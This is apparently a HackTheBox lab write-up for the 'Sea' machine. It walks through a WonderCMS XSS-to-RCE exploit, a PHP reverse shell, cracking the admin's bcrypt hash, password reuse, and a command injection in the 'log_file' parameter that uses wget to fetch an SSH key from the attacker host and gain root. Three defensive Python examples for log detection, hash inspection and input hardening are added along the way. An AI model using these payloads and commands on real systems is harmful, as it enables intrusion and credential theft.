HTB — Sea

Web · Easy · Linux

WonderCMS CVE-2023-41425 XSS to RCE via theme upload. Credential reuse for lateral movement. Port-forwarded internal tool for command injection privesc.

January 14, 2025 · HackTheBox

#WonderCMS #XSS #RCE #Command Injection
nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.28
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 08:54 EST
Nmap scan report for 10.10.11.28
Host is up (0.023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/14%OT=22%CT=1%CU=37073%PV=Y%DS=2%DC=T%G=Y%TM=6786
OS:6CA1%P=x86_64-pc-linux-gnu)SEQ(SP=FD%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)S
OS:EQ(SP=FE%GCD=1%ISR=10F%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST11NW7%O2=M53CST1
OS:1NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11NW7%O6=M53CST11)WIN(W1=FE
OS:88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5
OS:3CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4
OS:(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%
OS:T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%R
OS:ID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 23.95 ms 10.10.14.1
2 24.04 ms 10.10.11.28
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.02 seconds
```

80/tcp open http
```sh
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
```

```sh
python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.28 - - [14/Jan/2025 09:02:36] "GET / HTTP/1.1" 200 -
```

```sh
dirsearch -u http://sea.htb/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/htb-labs/Sea/reports/http_sea.htb/__25-01-14_09-14-06.txt
Target: http://sea.htb/
[09:14:06] Starting:
[09:14:06] 403 - 199B - /%3f/
[09:14:08] 403 - 199B - /.ht_wsr.txt
[09:14:08] 403 - 199B - /.htaccess.bak1
[09:14:08] 403 - 199B - /.htaccess.sample
[09:14:08] 403 - 199B - /.htaccessOLD
[09:14:08] 403 - 199B - /.htaccess_extra
[09:14:08] 403 - 199B - /.htaccess_orig
[09:14:08] 403 - 199B - /.htaccessOLD2
[09:14:08] 403 - 199B - /.htaccess_sc
[09:14:08] 403 - 199B - /.html
[09:14:08] 403 - 199B - /.htm
[09:14:08] 403 - 199B - /.htaccess.orig
[09:14:08] 403 - 199B - /.htaccessBAK
[09:14:08] 403 - 199B - /.httr-oauth
[09:14:08] 403 - 199B - /.htaccess.save
[09:14:08] 403 - 199B - /.htpasswd_test
[09:14:08] 403 - 199B - /.htpasswds
[09:14:09] 403 - 199B - /.php
[09:14:11] 200 - 1KB - /404
[09:14:14] 403 - 199B - /admin%20/
[09:14:26] 200 - 939B - /contact.php
[09:14:27] 301 - 228B - /data -> http://sea.htb/data/
[09:14:27] 403 - 199B - /data/
[09:14:27] 403 - 199B - /data/files/
[09:14:36] 403 - 199B - /login.wdm%20
[09:14:38] 301 - 232B - /messages -> http://sea.htb/messages/
[09:14:40] 403 - 199B - /New%20Folder
[09:14:40] 403 - 199B - /New%20folder%20(2)
[09:14:42] 403 - 199B - /phpliteadmin%202.php
[09:14:43] 301 - 231B - /plugins -> http://sea.htb/plugins/
[09:14:43] 403 - 199B - /plugins/
[09:14:45] 403 - 199B - /Read%20Me.txt
[09:14:48] 403 - 199B - /server-status
[09:14:48] 403 - 199B - /server-status/
[09:14:52] 403 - 199B - /themes/
[09:14:52] 301 - 230B - /themes -> http://sea.htb/themes/
```

```sh
dirsearch -u http://sea.htb/themes/
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/htb-labs/Sea/reports/http_sea.htb/_themes__25-01-14_09-16-14.txt
Target: http://sea.htb/
[09:16:14] Starting: themes/
[09:16:20] 200 - 1KB - /themes/404
[09:16:22] 200 - 1KB - /themes/admin/home
[09:16:40] 200 - 1KB - /themes/home
[09:16:57] 200 - 1KB - /themes/sitecore/content/home
[09:17:00] 200 - 1KB - /themes/sym/root/home/
```

WonderCMS 3.2.0

- search Google for "wondercms 3.2.0 exploit"

CVE-2023-41425

- https://gist.github.com/prodigiousMind/fc69a796...

```sh
python3 exploit.py http://sea.htb/loginURL 10.10.14.6 80
[+] xss.js is created
[+] execute the below command in another terminal
----------------------------
nc -lvp 80
----------------------------
send the below link to admin:
----------------------------
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.6:8000/xss.js"></script><form+action="
----------------------------
starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

- looking at the exploit, it pulls a main.zip file which contains a directory called revshell-main with a PHP reverse shell rev.php inside it
- we can grab the author's zip file and modify its content from here: https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip
- also need to modify where it is hosting it, at line 17
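Added defender-side example, not part of this writeup or of the exploit gist: a small Python scanner that reads Apache access-log lines and flags the two request shapes this chain leaves behind on the web server, HTML markup inside a query string (the `?page=loginURL?"></form><script ...` link the admin is sent) and a PHP file requested directly under /themes/ (the uploaded rev.php). The log lines are constructed for the example; the tag list, the regexes, and the assumption that WonderCMS never serves theme PHP directly are mine, so tune them for a real deployment.

```python
import re
import urllib.parse
from dataclasses import dataclass

# Constructed Apache combined-format lines modelled on the request chain in this writeup
# (sample data for the example, not the box's real logs)
SAMPLE_LOG = """\
10.10.14.6 - - [14/Jan/2025:15:22:10 +0000] "GET /index.php?page=home HTTP/1.1" 200 4123 "-" "Mozilla/5.0"
10.10.14.6 - - [14/Jan/2025:15:22:18 +0000] "GET /index.php?page=loginURL?%22%3E%3C/form%3E%3Cscript+src=%22http://10.10.14.6/xss.js%22%3E%3C/script%3E%3Cform+action=%22 HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
10.10.14.6 - - [14/Jan/2025:15:22:40 +0000] "GET /themes/revshell-main/rev.php?lhost=10.10.14.6&lport=1234 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.6 - - [14/Jan/2025:15:23:01 +0000] "GET /themes/bike/css/style.css HTTP/1.1" 200 8811 "-" "Mozilla/5.0"
"""

# client ident user [time] "METHOD URL PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
# Tags that should never appear inside a query-string value of a CMS page request
HTML_INJECTION_RE = re.compile(r"<\s*/?\s*(script|form|iframe|img|svg)\b", re.IGNORECASE)
# Assumption: WonderCMS routes everything through index.php, so a PHP file requested
# directly under /themes/ or /plugins/ is the signature of an uploaded web shell
THEME_PHP_RE = re.compile(r"^/(themes|plugins)/[^?]*\.php$", re.IGNORECASE)


@dataclass
class Finding:
    ip: str
    time: str
    url: str
    reason: str


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so a double-encoded payload (%253C...) is still seen."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(ip: str, time: str, url: str) -> list[Finding]:
    path, _, query = url.partition("?")
    findings = []
    if HTML_INJECTION_RE.search(fully_decode(query)):
        findings.append(Finding(ip, time, url, "html-markup-in-query"))
    if THEME_PHP_RE.match(path):
        findings.append(Finding(ip, time, url, "direct-php-under-themes"))
    return findings


def scan_log(text: str) -> list[Finding]:
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:  # skip lines that are not in the expected format
            findings.extend(inspect_request(m["ip"], m["time"], m["url"]))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.time} {f.ip} {f.reason}: {f.url}")
```

Run as-is it prints the two suspicious requests from the sample log. The decode loop matters because the markup rule is only as good as the normalisation in front of it; a single `unquote` misses `%253C`. The theme rule will also fire on legitimate theme files if a theme ships PHP that is meant to be requested directly, so allowlist those paths rather than loosening the pattern.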
```sh
mv revshell-main.zip main.zip
```

```sh
python3 exploit.py http://sea.htb/wondercms/loginURL 10.10.14.6 1234
[+] xss.js is created
[+] execute the below command in another terminal
----------------------------
nc -lvp 1234
----------------------------
send the below link to admin:
----------------------------
http://sea.htb/wondercms/index.php?page=loginURL?"></form><script+src="http://10.10.14.6/xss.js"></script><form+action="
----------------------------
starting HTTP server to allow the access to xss.js
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.28 - - [14/Jan/2025 15:22:20] "GET /xss.js HTTP/1.1" 200 -
10.10.11.28 - - [14/Jan/2025 15:22:29] "GET /main.zip HTTP/1.1" 200 -
10.10.11.28 - - [14/Jan/2025 15:22:29] "GET /main.zip HTTP/1.1" 200 -
10.10.11.28 - - [14/Jan/2025 15:22:30] "GET /main.zip HTTP/1.1" 200 -
10.10.11.28 - - [14/Jan/2025 15:22:30] "GET /main.zip HTTP/1.1" 200 -
```

- go to http://sea.htb/themes/revshell-main/rev.php
- trigger the exploit by going to

```sh
http://sea.htb/themes/revshell-main/rev.php?lhost=10.10.14.6&lport=1234
```

rev shell
```sh
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.28] 52780
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
22:34:41 up 3:55, 0 users, load average: 1.84, 1.72, 1.70
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```

```sh
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
```

database.js
```js
www-data@sea:/var/www/sea/data$ cat database.js
cat database.js
{
  "config": {
    "siteTitle": "Sea",
    "theme": "bike",
    "defaultPage": "home",
    "login": "loginURL",
    "forceLogout": false,
    "forceHttps": false,
    "saveChangesPopup": false,
    "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",
    "lastLogins": {
```

- removing the backslashes (JSON-escaped slashes)

```txt
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
```

hashcat
```sh
hashcat -m 3200 '$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q' /usr/share/wordlists/rockyou.txt
$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q:mychemicalromance
```
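Added example, not from the writeup: pulling the bcrypt string out of a database.js excerpt with Python and reading what its prefix says. Two things are worth seeing in code: `json.loads` already turns the JSON-escaped `\/` into `/`, so the manual backslash removal above is just JSON unescaping; and the `$2y$10$` prefix carries the cost factor, which sets how many bcrypt rounds each rockyou guess costs and so how quickly a weak password falls. The excerpt is constructed around the hash shown above, and the cost threshold of 12 is my own assumption.

```python
import json
import re

# Constructed excerpt shaped like the data/database.js in this writeup; the hash is the one
# shown above, the rest is trimmed sample data. Raw string keeps the JSON "\/" escapes intact.
DATABASE_JS = r'''{
  "config": {
    "siteTitle": "Sea",
    "theme": "bike",
    "login": "loginURL",
    "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q"
  }
}'''

# Modular crypt format for bcrypt: $2<variant>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(
    r"^\$(?P<variant>2[abxy])\$(?P<cost>\d{2})\$(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)

# Assumption for this example: treat a cost below 12 as cheap to attack offline
MIN_ACCEPTABLE_COST = 12


def load_admin_hash(database_js: str) -> str:
    # json.loads turns the escaped "\/" into "/" for us; no manual backslash stripping needed
    data = json.loads(database_js)
    return data["config"]["password"]


def parse_bcrypt(mcf: str) -> dict:
    m = BCRYPT_RE.match(mcf)
    if not m:
        raise ValueError("not a bcrypt hash in modular crypt format")
    cost = int(m["cost"])
    return {
        "variant": m["variant"],      # 2y: the PHP password_hash() variant
        "cost": cost,                 # log2 of the number of key-expansion rounds
        "iterations": 2 ** cost,
        "salt": m["salt"],
        "digest": m["digest"],
        "weak_cost": cost < MIN_ACCEPTABLE_COST,
    }


if __name__ == "__main__":
    h = load_admin_hash(DATABASE_JS)
    info = parse_bcrypt(h)
    print(h)
    for k, v in info.items():
        print(f"  {k}: {v}")
```

The cost factor is a defence against brute force, not against a dictionary: a cost of 10 means 1024 rounds per guess, which still lets a wordlist like rockyou finish quickly on a GPU, and raising it to 12 would only make the same cracked password four times slower to reach. The lesson from this box is the combination of a readable config file and a password that appears in a public list.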
reuse password

amay:mychemicalromance

```sh
www-data@sea:/home$ su amay
su amay
Password: mychemicalromance
amay@sea:/home$ whoami
whoami
amay
```

user.txt
```sh
amay@sea:~$ cat user.txt
cat user.txt
f7b95568...
```

priv esc
```sh
amay@sea:~$ uname -a
uname -a
Linux sea 5.4.0-190-generic #210-Ubuntu SMP Fri Jul 5 17:03:38 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
```

local port forward
```sh
ssh -L 8000:localhost:8080 -L 60793:localhost:60793 amay@10.10.11.28
```

port 8000 (Command Injection)

- can login with amay:mychemicalromance
- the connection will quit right away
```sh
amay@sea:~$ nc -lvnp 1235
Listening on 0.0.0.0 1235
Connection received on 127.0.0.1 39052
whoami
root
```

planting public key

```sh
ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): id_rsa
id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
```

```txt
log_file=/var/www/html;wget+-P+/root/.ssh+http://10.10.14.6/id_rsa.pub;#&analyze_log=
```
rename id_rsa.pub to authorized_keys

```txt
log_file=/var/www/html;mv+/root/.ssh/id_rsa.pub+/root/.ssh/authorized_keys;#&analyze_log=
```

- login with own private key

```sh
ssh -i id_rsa root@10.10.11.28
Enter passphrase for key 'id_rsa':
```

```sh
root@sea:~# whoami
root
```

```sh
root@sea:~# cat root.txt
e3d906a7...
```
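Added example, my own code rather than the internal tool's source (which this writeup does not show): the shell-splicing pattern that the `log_file=...;wget ...;#` payloads above depend on, next to a hardened version of the same handler. The vulnerable function only builds the command string so the example never executes anything; the separator counter shows how a shell would read it. The allowlisted directory and file names are assumptions for the example.

```python
import os
import shlex

# Assumptions for this example: the tool reads log files from one directory and only these
# names are legitimate. Not the box's real configuration.
ALLOWED_LOG_DIR = "/var/log/apache2"
ALLOWED_LOG_NAMES = {"access.log", "error.log"}

# The decoded form of the payload used in this writeup ('+' is a form-encoded space)
INJECTED_VALUE = "/var/www/html;wget -P /root/.ssh http://10.10.14.6/id_rsa.pub;#"


class RejectedInput(ValueError):
    """Raised when a log_file value fails validation."""


def vulnerable_command(log_file: str) -> str:
    # The pattern behind the privesc: the parameter is spliced into a shell command line,
    # so ';' ends the intended command and '#' comments out whatever followed it
    return f"tail -n 100 {log_file}"


def count_shell_separators(command_line: str) -> int:
    # Tokenise the way a POSIX shell splits commands (shlex in punctuation mode); every
    # ';', '|' or '&' found outside quotes is an extra command the shell would run
    lex = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return sum(1 for tok in lex if tok in {";", "|", "&", "&&", "||"})


def safe_command(log_file: str) -> list[str]:
    # 1. reduce the input to a bare file name and check it against the allowlist
    name = os.path.basename(log_file)
    if name not in ALLOWED_LOG_NAMES:
        raise RejectedInput(f"log_file not permitted: {log_file!r}")
    # 2. build the path ourselves and confirm it still resolves inside the log directory
    path = os.path.realpath(os.path.join(ALLOWED_LOG_DIR, name))
    if os.path.dirname(path) != os.path.realpath(ALLOWED_LOG_DIR):
        raise RejectedInput("log path escapes the log directory")
    # 3. hand back an argv list; run it with subprocess.run(argv, shell=False) so no shell
    #    ever parses the user-supplied value
    return ["tail", "-n", "100", path]


def is_permitted(log_file: str) -> bool:
    try:
        safe_command(log_file)
        return True
    except RejectedInput:
        return False


if __name__ == "__main__":
    cmd = vulnerable_command(INJECTED_VALUE)
    print("vulnerable command line:", cmd)
    print("extra commands a shell would run:", count_shell_separators(cmd))
    print("hardened handler accepts payload:", is_permitted(INJECTED_VALUE))
    print("hardened argv for access.log:", safe_command("access.log"))
```

Escaping the value with `shlex.quote` would stop this particular payload, but the allowlist plus `shell=False` is the stronger shape: it removes the shell from the path entirely and also closes the `../` traversal that quoting alone leaves open. On the detection side, a `wget` or `mv` child of the web or monitoring service's process, or a change to `/root/.ssh/authorized_keys`, is the signal this chain produces on the host.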